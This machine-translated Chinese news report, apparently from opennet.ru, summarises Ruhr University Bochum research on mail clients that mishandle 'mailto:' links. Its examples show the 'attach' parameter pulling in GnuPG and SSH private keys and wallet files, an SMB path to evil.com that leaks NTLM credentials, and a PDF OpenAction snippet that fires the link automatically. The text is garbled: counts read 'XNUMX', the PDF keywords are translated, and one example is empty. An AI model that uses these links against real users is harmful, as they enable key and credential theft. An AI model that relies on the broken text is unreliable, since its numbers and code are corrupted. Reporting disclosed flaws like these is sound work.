波鸿鲁尔大学(德国)的研究人员 () 处理带有高级参数的“mailto:”链接时邮件客户端的行为。 检查的 XNUMX 个电子邮件客户端中有 XNUMX 个容易受到使用“attach”参数操纵资源替换的攻击。 另外六个电子邮件客户端容易受到 PGP 和 S/MIME 密钥替换攻击,三个客户端容易受到提取加密邮件内容的攻击。
链接 «“用于自动打开电子邮件客户端,以便向链接中指定的收件人写信。 除了地址之外,您还可以指定其他参数作为链接的一部分,例如信件的主题和典型内容的模板。 拟议的攻击操纵“attach”参数,该参数允许您将附件附加到生成的消息中。
邮件客户端 Thunderbird、GNOME Evolution (CVE-2020-11879)、KDE KMail (CVE-2020-11880)、IBM/HCL Notes (CVE-2020-4089) 和 Pegasus Mail 容易受到允许您自动附加的微不足道的攻击任何本地文件,通过“mailto:?attach=path_to_file”等链接指定。 该文件是在不显示警告的情况下附加的,因此如果没有特别注意,用户可能不会注意到该信件将带有附件发送。
例如,使用类似“mailto:[电子邮件保护]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" 您可以将 GnuPG 中的私钥插入到信件中。 您还可以发送加密钱包 (~/.bitcoin/wallet.dat)、SSH 密钥 (~/.ssh/id_rsa) 以及用户可访问的任何文件的内容。 此外,Thunderbird 允许您使用“attach=/tmp/*.txt”等结构通过掩码附加文件组。
除了本地文件之外,某些电子邮件客户端还处理指向网络存储的链接和 IMAP 服务器中的路径。 特别是,IBM Notes 允许您在处理“attach=\\evil.com\dummyfile”等链接时从网络目录传输文件,以及通过向攻击者控制的 SMB 服务器发送链接来拦截 NTLM 身份验证参数(请求将与当前的身份验证参数用户一起发送)。
Thunderbird 成功处理“attach=imap:///fetch>UID>/INBOX>1/”等请求,这允许您附加 IMAP 服务器上文件夹中的内容。 同时,从 IMAP 检索并通过 OpenPGP 和 S/MIME 加密的邮件在发送前会由邮件客户端自动解密。 Thunderbird 的开发者是 关于二月份的问题和问题中 该问题已得到解决(Thunderbird 分支 52、60 和 68 仍然容易受到攻击)。
旧版本的 Thunderbird 还容易受到研究人员提出的另外两种针对 PGP 和 S/MIME 的攻击变体的攻击。 特别是,Thunderbird 以及 OutLook、PostBox、eM Client、MailMate 和 R2Mail2 都受到密钥替换攻击,原因是邮件客户端自动导入并安装在 S/MIME 消息中传输的新证书,从而允许攻击者组织替换用户已存储的公钥。
Thunderbird、PostBox 和 MailMate 容易受到第二种攻击,它操纵自动保存草稿消息机制的功能,并允许使用 mailto 参数启动加密消息的解密或为任意消息添加数字签名,其中随后将结果传输到攻击者的 IMAP 服务器。 在本次攻击中,密文通过“body”参数传输,并使用“meta刷新”标签向攻击者的IMAP服务器发起调用。 例如: ' '
要自动处理“mailto:”链接而无需用户交互,可以使用专门设计的 PDF 文档 - PDF 中的 OpenAction 操作允许您在打开文档时自动启动 mailto 处理程序:
%PDF-1.5
第1章 0
<< /类型 /Catalog /OpenAction [2 0 R] >>
结束对象
第2章 0
<< /Type /Action /S /URI/URI (mailto:?body=——BEGIN PGP MESSAGE——[…])>>
结束对象
来源: opennet.ru